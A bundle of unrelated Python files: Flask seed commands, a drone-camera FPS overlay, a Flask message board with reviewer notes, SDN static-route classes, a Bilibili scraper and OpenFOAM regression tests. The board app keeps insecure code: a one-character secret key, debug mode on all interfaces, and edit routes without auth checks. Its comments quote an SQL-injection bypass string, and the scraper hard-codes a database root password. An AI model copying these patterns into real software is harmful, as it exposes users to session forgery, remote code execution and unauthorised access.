    NOTE(review): order looks like parents-before-children (users, then
    stories/formats, then micro_stories) -- confirm against the FK relations.
    """
    seed_users()
    seed_stories()
    seed_formats()
    seed_micro_stories()
    # Add other seed functions here
# Creates the `flask seed undo` command
@seed_commands.command('undo')
def undo():
    """Remove seeded rows.

    NOTE(review): undo_users() runs before undo_stories(); if stories hold a
    foreign key on users this order may violate constraints -- consider
    undoing in reverse seed order. micro_stories are seeded but never undone
    here; confirm whether undo_stories covers them.
    """
    undo_users()
    undo_stories()
    # db.session.execute('TRUNCATE subscription_tiers;')
    # db.session.commit()
    undo_formats()
    # Add other undo functions here
|
from pioneer_sdk import Pioneer
import numpy as np
import cv2
import time
# Module-level drone handle; presumably connects on construction -- confirm
# against the pioneer_sdk docs.
pioneer_mini = Pioneer()
def img_decorate_with_text(image, text, org=(50, 50,)):
    """Draw *text* onto *image* at position *org* and return the image."""
    annotated = cv2.putText(
        image,
        text,
        org,
        cv2.QT_FONT_NORMAL,  # font face
        1,                   # font scale
        (0, 255, 0),         # BGR green
        1,                   # stroke thickness
        cv2.LINE_AA,
    )
    return annotated
class FpsCounter:
    """Tracks instantaneous FPS over ~2 s probe windows plus a running mean."""

    PROBE_TIME_SECONDS = 2.0
    MEAN_RESET_SECONDS = 10.0  # the running-mean window restarts this often

    def __init__(self):
        self.time_origin = time.time()   # start of the running-mean window
        self.frames_overall = 0          # frames seen in the running-mean window
        self.time = time.time()          # start of the current probe window
        self.count = 0                   # frames seen in the current probe window

    def __reset(self):
        # Begin a new probe window.
        self.count = 0
        self.time = time.time()

    def inc(self) -> float or None:
        """
        Register one frame.

        :return: FPS, if ready. None otherwise
        """
        self.count += 1
        self.frames_overall += 1
        # Periodically restart the running-mean window so the mean tracks
        # recent throughput rather than the whole session.
        if time.time() - self.time_origin > FpsCounter.MEAN_RESET_SECONDS:
            self.frames_overall = 0
            self.time_origin = time.time()
        time_diff = time.time() - self.time
        if time_diff > FpsCounter.PROBE_TIME_SECONDS:
            fps = self.count / time_diff if self.count > 0 else 0
            self.__reset()
            return fps
        else:
            return None

    def fps_mean(self) -> float:
        """Mean FPS since the running-mean window began (0.0 if none elapsed)."""
        elapsed = time.time() - self.time_origin
        # BUG FIX: guard against ZeroDivisionError when called immediately
        # after construction or right after the window reset in inc().
        if elapsed <= 0:
            return 0.0
        return self.frames_overall / elapsed
if __name__ == '__main__':
    # Stream frames from the drone camera, overlaying instantaneous and mean
    # FPS, until Esc is pressed.
    fps_counter = FpsCounter()
    prev_fps = 0  # last completed probe-window FPS, shown while the next fills
    while True:
        camera_frame = pioneer_mini.get_raw_video_frame()
        if camera_frame is not None:
            # Frames arrive as an encoded byte buffer; decode to a BGR image.
            camera_frame = cv2.imdecode(np.frombuffer(camera_frame, dtype=np.uint8), cv2.IMREAD_COLOR)
            fps = fps_counter.inc()
            if fps is not None:
                prev_fps = fps
            camera_frame = img_decorate_with_text(camera_frame, f'fps: {prev_fps}')
            camera_frame = img_decorate_with_text(camera_frame, f'fps_mean: {fps_counter.fps_mean()}', (50,100,))
            cv2.imshow('pioneer_camera_stream', camera_frame)
        key = cv2.waitKey(1)
        if key == 27:  # esc
            print('esc pressed')
            cv2.destroyAllWindows()
            exit(0)
# -*- coding: utf-8 -*-
from flask import Flask,session,g,render_template,request,redirect,url_for,escape
import sqlite3
import hashlib
from werkzeug import secure_filename
app = Flask(__name__)
DATABASE = './test.db'
# NOTE(review): one-character hard-coded secret key -- session cookies are
# trivially forgeable; load a strong random key from config instead.
app.secret_key = 'a'
def get_db():
    """Return the request-scoped SQLite connection, opening it on first use."""
    if getattr(g, '_database', None) is None:
        conn = sqlite3.connect(DATABASE)
        # Rows behave like dicts (column access by name) as well as tuples.
        conn.row_factory = sqlite3.Row
        g._database = conn
    return g._database
def init_db():
    """(Re)create the schema from schema.sql.

    BUG FIX: sqlite3's execute() runs only a single statement, so a
    multi-statement schema file failed -- executescript() handles it.
    The file handle is now closed deterministically as well.
    """
    with app.app_context():
        db = get_db()
        with open('schema.sql', 'r') as f:
            db.executescript(f.read())
        db.commit()
def add_user(user_email, user_pw, user_nick, user_phone):
    """Insert a new user row, storing a SHA-224 digest of the password.

    BUG FIX: the digest was computed over the literal bytes b"user_pw"
    instead of the supplied password, so every account stored the same hash.
    Also switched to a parameterized query (the string-formatted SQL was
    injectable from the signup form).
    """
    pw = hashlib.sha224(user_pw.encode('utf-8')).hexdigest()
    sql = 'insert into users(user_email,user_pw,user_nick,user_phone) values(?,?,?,?)'
    db = get_db()
    db.execute(sql, (user_email, pw, user_nick, user_phone))
    db.commit()
def get_user(user_email, user_pw):
    """Return user rows matching the email/password pair (empty list if none).

    BUG FIX: hashes the actual password (was the literal b"user_pw"), and
    binds parameters -- the formatted SQL allowed authentication bypass via
    injection (e.g. '" or "1"="1').
    """
    pw = hashlib.sha224(user_pw.encode('utf-8')).hexdigest()
    sql = 'select * from users where user_email=? and user_pw=?'
    db = get_db()
    rv = db.execute(sql, (user_email, pw))
    res = rv.fetchall()
    return res
def update_user(user_pw, user_nick, user_phone, user_email):
    """Update password/nick/phone for *user_email*.

    BUG FIX: hashes the supplied password instead of the literal b"user_pw",
    and binds parameters instead of formatting them into the SQL.
    """
    pw = hashlib.sha224(user_pw.encode('utf-8')).hexdigest()
    sql = 'update users set user_pw=?,user_nick=?,user_phone=? where user_email=?'
    db = get_db()
    db.execute(sql, (pw, user_nick, user_phone, user_email))
    db.commit()
def find_user_info(user_email):
    """Return all user rows for *user_email* (parameterized; was injectable)."""
    db = get_db()
    rv = db.execute('select * from users where user_email=?', (user_email,))
    res = rv.fetchall()
    return res
def del_user(user_email):
    """Delete the user row for *user_email*.

    Returns '' (kept for existing callers). Parameterized; was injectable.
    """
    db = get_db()
    db.execute('delete from users where user_email=?', (user_email,))
    db.commit()
    return ''
def add_board(title, text, writer, _file):
    """Insert a board post (parameterized; the formatted SQL was injectable).

    *_file* may be '' or a FileStorage; str() preserves the old behaviour of
    storing its textual representation. Returns commit()'s result, which is
    always None (kept for compatibility).
    """
    db = get_db()
    db.execute('insert into board(title,text,writer,_file) values(?,?,?,?)',
               (title, text, writer, str(_file)))
    res = db.commit()
    return res
def show_all():
    """Return (idx, title, writer, dt) for every board post."""
    cursor = get_db().execute('select idx,title,writer,dt from board')
    rows = cursor.fetchall()
    cursor.close()
    return rows
def get_nick(user_email):
    """Return [(user_nick,)] rows for *user_email* (parameterized; was injectable)."""
    db = get_db()
    rv = db.execute('select user_nick from users where user_email=?', (user_email,))
    res = rv.fetchall()
    rv.close()
    return res
def get_view(idx):
    """Return the full board row for post *idx* (parameterized; was injectable)."""
    db = get_db()
    rv = db.execute('select * from board where idx=?', (idx,))
    res = rv.fetchall()
    rv.close()
    return res
def board_editt(idx, title, contents):
    """Update title/text of post *idx* (parameterized; was injectable)."""
    db = get_db()
    db.execute('update board set title=?,text=? where idx=?', (title, contents, idx))
    db.commit()
@app.route('/')
def index():
    """Render the landing page."""
    return render_template('index.html')
@app.route('/login',methods=['GET','POST'])
def login():
    """Login form (GET) or credential check (POST).

    A logged-in GET shows the member page directly instead of the form.
    """
    if request.method == 'GET':
        if 'user_email' in session:
            res = find_user_info(escape(session['user_email']))
            return render_template('jisub.html',data=res)
        else:
            return render_template('login.html')
        #return redirect(url_for('index'))
    else:
        user_email = request.form.get('user_email')
        user_pw = request.form.get('user_pw')
        # Non-empty result means the email/password pair matched.
        ok = get_user(user_email,user_pw)
        if ok:
            session['user_email'] = user_email
            return render_template('jisub.html',data=ok)
        else:
            return redirect(url_for('index'))
@app.route('/join',methods=['GET','POST'])
def join():
    """Signup form (GET) / create the account and redirect to login (POST)."""
    if request.method == 'GET':
        return render_template('join.html')
    else:
        user_email = request.form.get('user_email')
        user_pw = request.form.get('user_pw')
        user_nick = request.form.get('user_nick')
        user_phone = request.form.get('user_phone')
        add_user(user_email,user_pw,user_nick,user_phone)
        return redirect(url_for('login'))
@app.route('/logout')
def logout():
    """Drop the session's user and return to the landing page."""
    session.pop('user_email',None)
    return redirect(url_for('index'))
@app.route('/edit',methods=['GET','POST'])
def edit():
    """Show (GET) or apply (POST) profile edits for the logged-in user."""
    if request.method == 'GET':
        if 'user_email' in session:
            res = find_user_info(escape(session['user_email']))
            return render_template('edit.html',data=res)
        else:
            return "fucking man~"
    else:
        if 'user_email' in session:
            user_pw = request.form.get('user_pw')
            user_nick = request.form.get('user_nick')
            user_phone = request.form.get('user_phone')
            update_user(user_pw,user_nick,user_phone,escape(session['user_email']))
            # NOTE(review): res is fetched but unused; the redirect discards it.
            res = find_user_info(escape(session['user_email']))
            return redirect(url_for('index'))
        else:
            return "꺼져"
@app.route('/delete')
def del_users():
    """Delete the logged-in user's own account."""
    if 'user_email' in session:
        del_user(escape(session['user_email']))
        return redirect(url_for('index'))
    else:
        return 'Error'
@app.route('/board',methods=['GET'])
def board():
    """List all board posts (login required)."""
    if 'user_email' in session:
        res = show_all()
        return render_template('board.html', data=res)
    else:
        return redirect(url_for('login'))
@app.route('/board_write',methods=['GET','POST'])
def board_write():
    """Render the write form (GET) or create a post with optional upload (POST)."""
    if request.method == 'GET':
        if 'user_email' in session:
            #res = get_nick(escape(session['user_email']))
            res = get_nick(escape(session['user_email']))
            return render_template('board_write.html',data=res)
        else:
            return redirect(url_for('index'))
    else:
        if 'user_email' in session :
            title = request.form.get('title')
            contents = request.form.get('contents')
            _file = request.files['_file']
            # res[0][0] is the author's nickname.
            res = get_nick(escape(session['user_email']))
            if _file:
                # secure_filename strips path components from the upload name.
                _file.save('./uploads/'+secure_filename(_file.filename))
                add_board(title,contents,res[0][0],_file)
                return redirect(url_for('board'))
            else:
                _file=''
                add_board(title,contents,res[0][0],_file)
                return redirect(url_for('board'))
        else: return redirect(url_for('index'))
@app.route('/board/<idx>',methods=['GET','POST'])
def board_view(idx):
    """Show post *idx* with its replies (GET) or append a reply (POST)."""
    if request.method=='GET':
        if 'user_email' in session:
            res = get_view(idx)
            res2 = board_reply_get(idx)
            return render_template('board_view.html',data=res,data2=res2)
        else: return redirect(url_for('index'))
    else:
        # NOTE(review): the POST path has no session guard; an anonymous POST
        # raises KeyError on session['user_email'].
        re = request.form.get('reply')
        nick = get_nick(escape(session['user_email']))
        board_reply_save(idx,re,nick[0][0])
        return redirect(url_for('board_view',idx=idx))
@app.route('/board_edit/<idx>',methods=['GET','POST'])
def board_edit(idx):
    """Edit post *idx*: owner-checked form on GET, apply changes on POST."""
    if request.method == 'GET':
        if 'user_email' in session:
            rt = get_nick(escape(session['user_email']))
            # ghkrdls returns the row only when this nickname owns the post.
            res = ghkrdls(idx,rt[0][0])
            if res:
                return render_template('board_edit.html',data=res)
            else: return redirect(url_for('board'))
        else: return redirect(url_for('index'))
    else:
        # NOTE(review): the POST path performs no session or ownership check.
        ed_title = request.form.get('title')
        ed_contents = request.form.get('contents')
        board_editt(idx,ed_title,ed_contents)
        return redirect(url_for('board'))
@app.route('/board_del/<idx>')
def board_del(idx):
    """Delete post *idx* if the logged-in user wrote it.

    BUG FIX: the not-logged-in branch built a redirect but never returned it,
    so Flask raised "view did not return a valid response". Also removed an
    unused board_reply_get() lookup (a pure SELECT with no side effects).
    """
    if 'user_email' in session:
        rt = get_nick(escape(session['user_email']))
        # Ownership check: a row comes back only when idx belongs to this nick.
        res = ghkrdls(idx, rt[0][0])
        if res:
            board_dell(idx)
            return redirect(url_for('board'))
        else:
            return "<script>alert('삭제권한없음');history.back()</script>"
    else:
        return redirect(url_for('index'))
@app.route('/reply_edit/<idx>', methods=['GET','POST'])
def reply_edit(idx):
    """Edit reply *idx*.

    NOTE(review): unlike the other views there is no 'user_email in session'
    guard, so an anonymous request raises KeyError; reply ownership is never
    verified either.
    """
    if request.method == 'GET':
        res = get_reply_idx(idx)
        us = get_nick(escape(session['user_email']))
        return render_template('reply_edit.html',data=res,us=us)
    else:
        edit_text = request.form.get('edit')
        reply_update(idx,edit_text)
        return redirect(url_for('board_view',idx=idx))
@app.route('/reply_del/<idx>')
def reply_del(idx):
    """Delete reply *idx* when the logged-in user is its writer.

    NOTE(review): the module later redefines `reply_del` as a DB helper, so
    the recursive-looking call below resolves to that helper at run time
    (the route keeps working because the decorator already registered this
    function object). Renaming one of them would make this less fragile.
    BUG FIX: the not-logged-in branch now returns its redirect (it previously
    fell through and returned None).
    """
    if 'user_email' in session:
        res = get_reply_idx(idx)
        us = get_nick(escape(session['user_email']))
        if res[0][1] == us[0][0]:
            reply_del(idx)  # calls the later-defined DB helper, not this view
            return redirect(url_for('board_view', idx=idx))
        else:
            return "<script>alert('삭제권한없음');history.back()</script>"
    else:
        return redirect(url_for('index'))
def reply_del(idx):
    """DB helper: delete reply *idx* (parameterized; was injectable).

    NOTE(review): this redefinition shadows the /reply_del view function of
    the same name defined above.
    """
    db = get_db()
    db.execute('delete from board_reply where idx=?', (idx,))
    db.commit()
def reply_update(idx, edit_text):
    """Replace the text of reply *idx* (parameterized; was injectable)."""
    db = get_db()
    db.execute('update board_reply set text=? where idx=?', (edit_text, idx))
    db.commit()
def get_reply_idx(idx):
    """Return (idx2, writer) rows for reply *idx* (parameterized; was injectable)."""
    db = get_db()
    rv = db.execute('select idx2,writer from board_reply where idx=?', (idx,))
    res = rv.fetchall()
    rv.close()
    return res
def ghkrdls(idx, nick):
    """Ownership lookup: return post *idx* only when written by *nick*.

    Parameterized; the formatted SQL was injectable.
    """
    db = get_db()
    rv = db.execute(
        'select idx,title,text,writer,_file from board where idx=? and writer=?',
        (idx, nick))
    res = rv.fetchall()
    rv.close()
    return res
def board_dell(idx):
    """Delete post *idx* (parameterized; was injectable)."""
    db = get_db()
    db.execute('delete from board where idx=?', (idx,))
    db.commit()
def board_reply_save(idx2, text, writer):
    """Insert a reply on post *idx2* (parameterized; was injectable)."""
    db = get_db()
    db.execute('insert into board_reply(idx2,text,writer) values(?,?,?)',
               (idx2, text, writer))
    db.commit()
def board_reply_get2(idx):
    """Return (idx2, text, writer) rows keyed by reply primary key *idx*."""
    db = get_db()
    rv = db.execute('select idx2,text,writer from board_reply where idx=?', (idx,))
    res = rv.fetchall()
    rv.close()
    return res
def board_reply_get(idx):
    """Return all replies (idx, text, writer, dt) for post *idx* (parameterized)."""
    db = get_db()
    rv = db.execute('select idx,text,writer,dt from board_reply where idx2=?', (idx,))
    res = rv.fetchall()
    rv.close()
    return res
if __name__ == '__main__':
    # NOTE(review): debug=True exposes the Werkzeug debugger (arbitrary code
    # execution) while bound to 0.0.0.0 -- never run this way in production.
    app.run(debug=True,host='0.0.0.0',port=8889)
|
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
protocols.py: Protocols specific properties and access methods
"""
import json
from pysdn.common.utils import (strip_none,
remove_empty_from_dict,
dict_keys_underscored_to_dashed)
class StaticRoute():
    ''' Class representing static route parameters.

    Serializes to the Vyatta "vyatta-protocols-static:static" YANG subtree;
    get_payload() strips empty/None members before emitting JSON.
    '''
    # Module names used to build the RESTCONF URL extension / payload key.
    _mn1 = "vyatta-protocols:protocols"
    _mn2 = "vyatta-protocols-static:static"

    def __init__(self):
        ''' Static ARP translation (list) '''
        self.arp = []
        ''' Interface based static route '''
        self.interface_route = []
        ''' Interface based IPv6 static route (list) '''
        self.interface_route6 = []
        ''' Static route (list) '''
        self.route = []
        ''' Static IPv6 route (list) '''
        self.route6 = []
        ''' Policy route table (range 1..128) (list) '''
        self.table = []

    def to_string(self):
        """ Return this object as a string """
        return str(vars(self))

    def to_json(self):
        """ Return this object as JSON """
        return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True,
                          indent=4)

    def get_payload(self):
        """ Return the request payload: JSON with None/empty members removed
        and underscores in keys replaced by dashes (YANG naming). """
        s = self.to_json()
        obj = json.loads(s)
        obj1 = strip_none(obj)
        obj2 = remove_empty_from_dict(obj1)
        obj3 = dict_keys_underscored_to_dashed(obj2)
        payload = {self._mn2: obj3}
        return json.dumps(payload, default=lambda o: o.__dict__,
                          sort_keys=True, indent=4)

    def get_url_extension(self):
        """ Return the URL path fragment for this subtree. """
        s = ("%s/%s") % (self._mn1, self._mn2)
        return s

    def set_interface_route(self, ip_prefix):
        """ Return the InterfaceRoute for *ip_prefix*, creating it if absent. """
        route = self._find_create_interface_route(ip_prefix)
        assert (isinstance(route, InterfaceRoute))
        return route

    def set_interface_route_next_hop_interface(self, ip_prefix, if_name,
                                               disable=None, distance=None):
        """ Attach/update a next-hop interface on the route for *ip_prefix*. """
        route = self._find_create_interface_route(ip_prefix)
        assert (isinstance(route, InterfaceRoute))
        route.set_next_hop_interface(if_name, disable, distance)

    def _find_create_interface_route(self, ip_prefix):
        # Find-or-create keyed on the route's tagnode (the IPv4 prefix).
        route = None
        for item in self.interface_route:
            if (item.tagnode == ip_prefix):
                route = item
                break
        if (route is None):
            route = InterfaceRoute(ip_prefix)
            self.interface_route.append(route)
        return route
class InterfaceRoute():
    ''' Helper sub-class of the 'Static' class.

    Interface based static route, keyed by an IPv4 prefix; owns a list of
    per-interface next hops.
    '''

    def __init__(self, ip_prefix):
        # IPv4 prefix this route matches.
        self.tagnode = ip_prefix
        # NextHopInterface entries attached to this route.
        self.next_hop_interface = []

    def set_next_hop_interface(self, ifName, disable=None, distance=None):
        """ Create/find the next hop for *ifName*, applying optional flags. """
        next_hop = self._find_create_next_hop_interface(ifName)
        assert (isinstance(next_hop, NextHopInterface))
        if disable is not None:
            next_hop.set_disable(disable)
        if distance is not None:
            next_hop.set_distance(distance)

    def disable_next_hop_interface(self, ifName):
        """ Mark the next hop on *ifName* as disabled (creating it if needed). """
        next_hop = self._find_create_next_hop_interface(ifName)
        assert (isinstance(next_hop, NextHopInterface))
        next_hop.set_disable(True)

    def enable_next_hop_interface(self, ifName):
        """ Clear the disable flag on the next hop for *ifName*. """
        next_hop = self._find_create_next_hop_interface(ifName)
        assert (isinstance(next_hop, NextHopInterface))
        next_hop.set_disable(False)

    def set_next_hop_interface_distance(self, ifName, distance):
        """ Set the administrative distance on the next hop for *ifName*. """
        next_hop = self._find_create_next_hop_interface(ifName)
        assert (isinstance(next_hop, NextHopInterface))
        next_hop.set_distance(distance)

    def _find_create_next_hop_interface(self, ifName):
        # Find-or-create keyed on the interface name.
        next_hop = next(
            (nh for nh in self.next_hop_interface if nh.tagnode == ifName),
            None)
        if next_hop is None:
            next_hop = NextHopInterface(ifName)
            self.next_hop_interface.append(next_hop)
        return next_hop
class NextHopInterface():
    ''' Helper sub-class of the 'InterfaceRoute' class.

    A single next-hop interface entry: name, optional disable flag and
    optional administrative distance.
    '''

    def __init__(self, name):
        # Interface name.
        self.tagnode = name
        # Disable flag: "" when disabled, None when enabled (this matches
        # the YANG "presence leaf" encoding used by the payload builder).
        self.disable = None
        # Administrative distance for this route (range 1..255), or None.
        self.distance = None

    def set_disable(self, value):
        """ Set or clear the disable presence leaf. """
        self.disable = "" if value else None

    def set_distance(self, value):
        """ Record the administrative distance. """
        self.distance = value
|
# coding: utf-8
# Writer: bao
# Date: 2018-11-30
import json
import requests
import re
import pymysql
from bs4 import BeautifulSoup
import time
# Open the MySQL connection once at import time; abort the script if the
# server is unreachable, since nothing below can work without it.
# NOTE(review): credentials are hard-coded in source -- move to config.
try:
    conn = pymysql.connect(host='localhost', user='root', passwd='mysql1820', db='bilibili', use_unicode=True,
                           charset="utf8")
except Exception as err:
    print(str(err))
    exit(0)
def create(table_name):
    """Drop *table_name* and (re)create the comment table.

    NOTE(review): the DROP uses *table_name* but the CREATE always builds
    `comment_db`, so create("keyword_based_info") drops one table and
    creates another -- confirm which name is intended before fixing.
    """
    # 使用cursor()方法获取操作游戏 -> Obtain a cursor for the shared connection.
    cursor = conn.cursor()
    # 如果数据表已经存在使用 execute() 方法删除表。-> Drop the table if it
    # already exists so the schema below always applies cleanly.
    cursor.execute("DROP TABLE IF EXISTS %s"%(table_name))
    # 创建数据表SQL语句 -> CREATE TABLE statement for the comment store.
    sql = """CREATE TABLE comment_db (
           aid int NOT NULL PRIMARY KEY,
           comment varchar(255),
           floor int,
           rcount int,
           likes int,
           uname varchar(255),
           mid int,
           sex varchar(255),
           sign varchar(255),
           ctime varchar(255))ENGINE=innodb DEFAULT CHARSET=utf8;"""
    try:
        cursor.execute(sql)
        conn.commit()
    except:
        print('it is failed to create')
        conn.rollback()
    cursor.close()
def insert_to_comment_db(db, aid):
    """Fetch all reply pages for video *aid* from the Bilibili API and
    upsert them into `comment_db`.

    BUG FIX: the REPLACE statement was missing the spaces between keywords
    ("replaceintocomment_dbvalues...") and the comma between the sign and
    ctime placeholders, so every execute failed. It is now a parameterized
    query, which also stops SQL injection via comment text.
    """
    try:
        comment = 1  # running count of stored replies
        page = 1
        while True:
            url = "https://api.bilibili.com/x/v2/reply?&pn=%s&type=1&oid=%s" % \
                  (page, aid)
            resp = requests.get(url)
            data_api = resp.json()
            temp = data_api['data']
            replies = temp['replies']
            for reply in replies:
                # The API gives ctime as a unix timestamp; store it readable.
                reply['ctime'] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(reply['ctime']))
                cursor = db.cursor()
                sql = ("replace into comment_db values "
                       "(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)")
                args = (aid, reply['content']['message'], reply['floor'], reply['rcount'],
                        reply['like'], reply['member']['uname'], reply['member']['mid'],
                        reply['member']['sex'], reply['member']['sign'], reply['ctime'])
                print(sql)
                try:
                    cursor.execute(sql, args)
                    db.commit()
                    comment = comment + 1
                except Exception:
                    print('it is failed to insert')
                    db.rollback()
                cursor.close()
            # Advance while the API reports more replies than we have stored.
            if temp['page']['acount'] > comment:
                page = page + 1
            else:
                break
    except Exception:
        print("error")
def getbilibili_vedioinf(keyword_list):
    """Scrape Bilibili search-result pages for each keyword and store them.

    BUG FIX: the per-video upload date was bound to a local named `time`,
    shadowing the imported `time` module for the rest of the loop; it is
    now `pub_time`. The `type` local no longer shadows the builtin either.
    NOTE(review): `insert(conn, data)` is not defined anywhere in this file,
    so the first scraped video raises NameError -- confirm which insert
    helper was intended.
    """
    try:
        for mid in keyword_list:
            page = 1
            while True:
                url_vlist = "https://search.bilibili.com/all?keyword=%s&page=%s" % (
                    mid, page)
                response = requests.get(url_vlist)
                soup = BeautifulSoup(response.text, 'lxml')
                divs = soup.find_all('li', attrs={"class": "video matrix"})
                if not divs:
                    break  # past the last results page for this keyword
                for div in divs:
                    pic = div.find("img").get('src')
                    length = div.find("span", attrs={"class": "so-imgTag_rb"}).get_text()
                    avid = div.find(class_="type avid").get_text()
                    video_type = div.find(class_="type hide").get_text()
                    info = div.find("a", attrs={"class": "title"})
                    title = info.get('title')
                    url = info.get('href')
                    des = div.find("div", attrs={"class": "des hide"}).get_text()
                    tags = div.find("div", attrs={"class": "tags"})
                    pub_time = tags.find("span", attrs={"class": "so-icon time"}).get_text()
                    author = tags.find("a", attrs={"class": "up-name"}).get_text()
                    # avid looks like "av12345"; strip the "av" prefix.
                    data = dict(aid=avid[2:], url=url, title=title, description=des.strip(),
                                type=video_type.strip(), author=author, created=pub_time.strip(),
                                length=length.strip(), pic=pic.strip())
                    insert(conn, data)
                page = page + 1
    except Exception:
        print('no found')
if __name__ == "__main__":
    # url = 'https://space.bilibili.com/ajax/member/getSubmitVideos?mid=20165629&pagesize=100&tid=0&page=1&keyword=&order=pubdate'
    # Create the destination table.
    table_name = "keyword_based_info"
    create(table_name)
    # Reference uploader IDs (mid) of some official accounts:
    # 20165629  Communist Youth League Central Committee
    # 10303206  Global Times
    # 107255471 CCTV2 "First Time" official account
    # 258844831 CCTV "National Treasure"
    # 274900004 CCTV4
    # NOTE(review): "人民日报" appears twice in the list below -- confirm
    # whether the duplicate is intentional.
    keyword_list=["人民日报","新华社","新华网","中国新闻社","CCTV","人民网","人民日报","环球时报","共青团中央"]
    # space_url = "https://space.bilibili.com/21778636/#/video?tid=0&page=1&keyword=&order=pubdate"
    getbilibili_vedioinf(keyword_list)
|
import os
import reframe.utility.sanity as sn
from reframe.core.pipeline import RunOnlyRegressionTest
class OpenfoamExtendBaseTest(RunOnlyRegressionTest):
    """Common configuration for the OpenFOAM-Extend run-only checks.

    Each subclass supplies the OpenFOAM executable name (which doubles as
    the check name) and a description; system, environment and module setup
    are shared here.
    """
    def __init__(self, check_name, check_descr, **kwargs):
        super().__init__('OpenfoamExtend_%s' % (check_name),
                         os.path.dirname(__file__), **kwargs)
        self.descr = check_descr
        # The check name doubles as the executable to invoke.
        self.executable = check_name
        self.sourcesdir = os.path.join(self.current_system.resourcesdir,
                                       'OpenFOAM-Extend', check_name)
        # OpenFOAM-Extend currently runs only on Leone
        self.valid_systems = ['leone:normal']
        self.valid_prog_environs = ['PrgEnv-gnu']
        self.modules = ['OpenFOAM-Extend/4.0-foss-2016b']
        self.num_tasks = 1
        self.num_tasks_per_node = 1
        self.num_cpus_per_task = 1
        self.sanity_patterns = sn.assert_found(r'^\s*[Ee]nd', self.stdout)
        # NOTE(review): num_tasks is set to 1 a few lines above, so this
        # branch is dead here; parallel subclasses assign num_tasks *after*
        # this constructor and install their own sanity_patterns instead.
        if self.num_tasks > 1:
            self.sanity_patterns = sn.assert_found(
                r'Finalising parallel run', self.stdout)
        self.maintainers = ['MaKra']
        self.tags = {'scs', 'production'}
        # Environment setup sourced before the run command.
        self.pre_run = ['source $FOAM_INST_DIR/foam-extend-4.0/etc/bashrc']
class BlockMesh(OpenfoamExtendBaseTest):
    """Meshing check: blockMesh on the dambreak tutorial."""
    def __init__(self, **kwargs):
        super().__init__('blockMesh',
                         'OpenFOAM-Extend blockMesh from '
                         'the dambreak tutorial',
                         **kwargs)
class SnappyHexMesh(OpenfoamExtendBaseTest):
    """Meshing check: snappyHexMesh on the motorbike tutorial."""
    def __init__(self, **kwargs):
        super().__init__(
            'snappyHexMesh',
            'OpenFOAM-Extend check of snappyHexMesh: motorbike tutorial',
            **kwargs)
class SimpleFoam(OpenfoamExtendBaseTest):
    """Parallel solver check: simpleFoam (6 MPI ranks) on the motorbike tutorial."""
    def __init__(self, **kwargs):
        super().__init__(
            'simpleFoam',
            'OpenFOAM-Extend check of simpleFoam: motorbike tutorial',
            **kwargs)
        self.executable_opts = ['-parallel']
        self.num_tasks = 6
        self.num_tasks_per_node = 6
        # Every global continuity error in the log must stay below 5e-4.
        result = sn.extractall(
            r'time step continuity errors : '
            r'\S+\s\S+ = \S+\sglobal = (?P<res>-?\S+),',
            self.stdout, 'res', float)
        self.sanity_patterns = sn.all(
            sn.map(lambda x: sn.assert_lt(abs(x), 5.e-04), result))
class SetFields(OpenfoamExtendBaseTest):
    """Field-initialization check: setFields on the dambreak tutorial."""
    def __init__(self, **kwargs):
        super().__init__(
            'setFields',
            # Typo fix: the description previously read "OpenFOA-Extend".
            'OpenFOAM-Extend check of setFields: dambreak tutorial',
            **kwargs)
class InterMixingFoam(OpenfoamExtendBaseTest):
    """Solver check: interMixingFoam on the dambreak tutorial."""
    def __init__(self, **kwargs):
        super().__init__(
            'interMixingFoam',
            # Typo fix: the description previously read "OpenFOA-Extend".
            'OpenFOAM-Extend check of interMixingFoam: dambreak tutorial',
            **kwargs)
        # The air-phase volume fraction line must appear exactly 2944 times.
        self.sanity_patterns = sn.assert_eq(sn.count(sn.findall(
            r'Air phase volume fraction', self.stdout)), 2944)
class BuoyantBoussinesqSimpleFoam(OpenfoamExtendBaseTest):
    """Solver check: buoyantBoussinesqSimpleFoam on the hotRoom test."""
    def __init__(self, **kwargs):
        super().__init__(
            'buoyantBoussinesqSimpleFoam',
            'OpenFOAM-Extend check buoyantBoussinesqSimpleFoam: hotRoom test',
            **kwargs)
        # (Removed a redundant self.executable assignment: the base class
        # already sets executable = check_name.)
        # Every global continuity error must stay below 1e-17.
        result = sn.extractall(
            r'\sglobal\s=\s(?P<res>\S+),',
            self.stdout, 'res', float)
        self.sanity_patterns = sn.all(
            sn.map(lambda x: sn.assert_lt(abs(x), 1.e-17), result))
class LaplacianFoam(OpenfoamExtendBaseTest):
    """Solver check: laplacianFoam on the flange tutorial.

    NOTE(review): the description says "check of setFields" -- looks
    copy-pasted; confirm and correct.
    """
    def __init__(self, **kwargs):
        super().__init__('laplacianFoam',
                         'OpenFOAM-Extend check of setFields: flange tutorial',
